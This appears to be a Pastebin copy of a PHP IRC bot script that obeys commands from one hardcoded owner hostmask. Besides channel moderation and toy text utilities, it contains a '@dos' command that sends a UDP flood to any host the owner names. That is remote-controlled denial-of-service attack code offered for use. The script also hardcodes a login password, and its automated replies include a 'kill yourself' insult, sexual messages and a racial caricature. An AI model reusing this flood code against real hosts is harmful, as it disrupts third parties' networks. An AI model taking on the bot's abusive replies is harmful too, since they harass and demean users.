Advertisement
Guest User

Untitled

a guest
Feb 11th, 2019
115
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.31 KB | None | 0 0
  1. <?
  2. //----------------------------
  3. //---Scripted by Tonic--------
  4. //---Edited by Jpeg------
  5. //-----Property of UG---------
  6. //-----You may edit-----------
  7. //---But cannot take credit--
  8. //----------------------------
  9. //Stops the script from timing out after 30 seconds
  10. set_time_limit(0);
  11.  
  12. //Connecting information
  13. $server="irc.geekshed.net";
  14.  
  15. $Port="6667";
  16.  
  17. $nick="PenguinEater";
  18.  
  19. $Channel="#TW@S";
  20. $pass = "";
  21.  
  22. $Channelpass="";
  23.  
  24. //Loop booleans
  25.  
  26. $loop = 0; $verbonden = 0;
  27. //Connecting to socket variable
  28.  
  29. $verbinden = fsockopen($server, $Port);
  30.  
  31. //Start connection and loop
  32.  
  33. while(1) {
  34.  
  35. while ($read = fgets($verbinden)) {
  36.  
  37.  
  38. //Detects strings and converts read variable into an array
  39.  
  40. $read = str_replace("\n","",$read); $read = str_replace("\r","",$read);
  41.  
  42. $read2 = explode(" ",$read);
  43.  
  44.  
  45.  
  46. //Starts loop back of login and logs the bot in as UniBot
  47.  
  48. if ($loop == 0) {
  49.  
  50. fputs($verbinden,"nick $nick\n\n");
  51.  
  52. fputs($verbinden,"USER UniBot 0 * :woopie\n\n");
  53. fputs($verbinden,"PASS uniwhore123%123\n\n");
  54.  
  55. }
  56.  
  57. //Converts read2 variable into string
  58. $args = NULL; for ($i = 4; $i < count($read2); $i++) { $args .= $read2[$i] . ' '; }
  59.  
  60.  
  61. if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); }
  62.  
  63.  
  64. //Joins channel
  65.  
  66. if ($read2[1] == 251) {
  67.  
  68. fputs($verbinden,"join $Channel $Channelpass\n");
  69.  
  70. $verbonden++;
  71.  
  72. }
  73.  
  74. //Gets user's NICK
  75. preg_match("/:(.*?)!/i", $read2[0], $matches);
  76.  
  77. //Stores user search result into nnick
  78. $nnick = $matches['1'];
  79.  
  80. //Starts random number for shredurface command block
  81. $id = mt_rand(0, 4);
  82.  
  83. //Kick Command, plain kick no reason
  84. if ((eregi("@kick", $read))&&(":BigDaddyMagnum!~Jpeg2k@5AA8A8CA.1CA79B2D.C0AFBDEC.IP" == $read2[0])) {
  85.  
  86. fputs($verbinden,"KICK $Channel $read2[4] \n");
  87.  
  88. }
  89.  
  90. //Kick command, kicks the user from the channel and puts old school socom error 30 for lagout ;)
  91. if ((eregi("@boot", $read))&&(":BigDaddyMagnum!~Jpeg2k@5AA8A8CA.1CA79B2D.C0AFBDEC.IP" == $read2[0])) {
  92.  
  93. if (eregi("UniBot", $read2[4])) {
  94. fputs($verbinden, "PRIVMSG $Channel :Uhh yes, hi.. um.... $nnick do you think i'm that stupid enough too boot myself? You failed, please.. Just kill yourself $nnick because that was a failed attempt and god should smight you for that epic fail.\n");
  95. }
  96. else {
  97.  
  98. fputs($verbinden, "KICK $Channel $read2[4] Network error(30)\n");
  99. }
  100.  
  101. }
  102.  
  103.  
  104. //Ban command, bans the username from the channel
  105. if ((eregi("@ban", $read))&&(":BigDaddyMagnum!~Jpeg2k@5AA8A8CA.1CA79B2D.C0AFBDEC.IP" == $read2[0])) {
  106. fputs ($verbinden, "MODE $Channel +b $read2[4] Network Error(35)\n");
  107. }
  108.  
  109. //Say command, make the bot say something
  110. if ((eregi("@say", $read))&&(":BigDaddyMagnum!~Jpeg2k@5AA8A8CA.1CA79B2D.C0AFBDEC.IP" == $read2[0])) {
  111. fputs ($verbinden, "PRIVMSG $Channel :$args\n");
  112. }
  113.  
  114. //Slap command, slap a user!
  115. if (eregi("@slap", $read)) {
  116. fputs ($verbinden, "PRIVMSG $Channel :Slaps $read2[4] a bit with a large cock\n");
  117. }
  118.  
  119. if (eregi("@hostname", $read)) {
  120. fputs($verbinden, "PRIVMSG $Channel :$read2[0]\n");
  121. }
  122.  
  123. //Reconnect command, stops script and refreshes page.. Half-Ass version
  124. if ((eregi("@reconnect", $read2[3]))&&(":BigDaddyMagnum!~Jpeg2k@5AA8A8CA.1CA79B2D.C0AFBDEC.IP" == $read2[0])) {
  125. fputs ($verbinden, "QUIT :Reconnecting..\n");
  126. Header("Location: newbot.php");
  127. }
  128.  
  129. //Detects the word sup and replies like a black man
  130. $sup = '/\bsup\b/i'; // Searches for sup as a single word
  131. if(preg_match($sup, $read)!==0)
  132. {
  133. fputs ($verbinden, "PRIVMSG $Channel :Aye What's Up G?\n");
  134. }
  135.  
  136. $bye = '/\bbye\b/i';
  137. if(preg_match($bye, $read)!==0) {
  138. fputs($verbinden, "PRIVMSG $Channel :Get the fuck out! $nnick\n");
  139. }
  140.  
  141. //Converts ASCII to md5 HASH
  142. if (eregi("@md5", $read)) {
  143. fputs ($verbinden, "PRIVMSG $Channel :".md5($args). "\n");
  144. }
  145.  
  146. //Detects word sex and blurs out dumb shit
  147. $botSearch = '/\bsex\b/i'; // Searches for sex as a single word
  148. if(preg_match($botSearch, $read)!==0)
  149. {
  150. fputs ($verbinden, "PRIVMSG $Channel :I wanna sex you $nnick, maybe we should meet in the #sex channel ;)\n");
  151. }
  152.  
  153. //OP Command, will op the user you put if user is detected
  154. //Format @op #Channel mode user
  155. if ((eregi("@op", $read))&&(":BigDaddyMagnum!~Jpeg2k@5AA8A8CA.1CA79B2D.C0AFBDEC.IP" == $read2[0])) {
  156. fputs ($verbinden, "mode $read2[4] $read2[5] $read2[6]\n");
  157. }
  158.  
  159. //ASCII To Hex Conversion function, prints out in HEX
  160. if (eregi("@hex", $read)) {
  161.  
  162. $hex = '';
  163. for ($i=0; $i < strlen($args); $i++)
  164. {
  165. $hex .= dechex(ord($args[$i]));
  166. }
  167. $string = $hex;
  168.  
  169. fputs ($verbinden, "PRIVMSG $Channel :$string\n");
  170. }
  171.  
  172. //ASCII To Binary Conversion Function, prints out in BINARY
  173. if (eregi("@bin", $read)) {
  174. $hex = '';
  175. for ($i=0; $i < strlen($args); $i++)
  176. {
  177. $hex .= decbin(ord($args[$i]));
  178. }
  179. $string = $hex;
  180. fputs ($verbinden, "PRIVMSG $Channel :$string\n");
  181. }
  182.  
  183. //Date Command, prints current date and military time
  184. if (eregi("@date", $read)) {
  185. $date = date("l jS \of F Y h:i:s T");
  186. fputs ($verbinden, "PRIVMSG $Channel :$date\n");
  187. }
  188. //Type backwards!
  189. if (eregi("@rev", $read)) {
  190. fputs ($verbinden, "PRIVMSG $Channel :".strrev($args)."\n");
  191. }
  192.  
  193. //Join Command, Joins a channel
  194. if (eregi("@join", $read)) {
  195. fputs($verbinden, "JOIN $read2[4]\n");
  196. }
  197.  
  198. //Quit command, kills the script
  199. if ((eregi("@quit", $read))&&(":BigDaddyMagnum!~Jpeg2k@5AA8A8CA.1CA79B2D.C0AFBDEC.IP" == $read2[0])) {
  200. fputs ($verbinden, "QUIT :Master is shutting me down..\n");
  201. die();
  202. }
  203.  
  204. //DoS command, responds only to your hostname set by IRC
  205. if ((eregi("@dos",$read))&&(":BigDaddyMagnum!~Jpeg2k@5AA8A8CA.1CA79B2D.C0AFBDEC.IP" == $read2[0])) {
  206.  
  207. fputs($verbinden,"privmsg $Channel :dos-udp - started udp flood - $read2[4]\n\n");
  208.  
  209. $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30); // Stores udp connection into fp
  210.  
  211. if (!$fp)
  212.  
  213. {
  214.  
  215. //Kills command if errors detected
  216.  
  217. exit;
  218.  
  219. }
  220.  
  221. else // continues function if no errors detected
  222.  
  223. {
  224.  
  225. $char = "%"; // Data to send
  226.  
  227. for($a = 0; $a < 9999999999999; $a++) // sets flood amount
  228.  
  229. $data = $data.$char; // Multiples data
  230.  
  231.  
  232.  
  233. if(fputs ($fp, $data) ) // If completed
  234.  
  235. fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n"); // Tell channel its finished
  236.  
  237. else
  238.  
  239. fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n"); // Tell channel if error occured
  240.  
  241. }
  242.  
  243. }
  244. $loop++; // Loops the script to keep running
  245. }
  246. }
  247. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement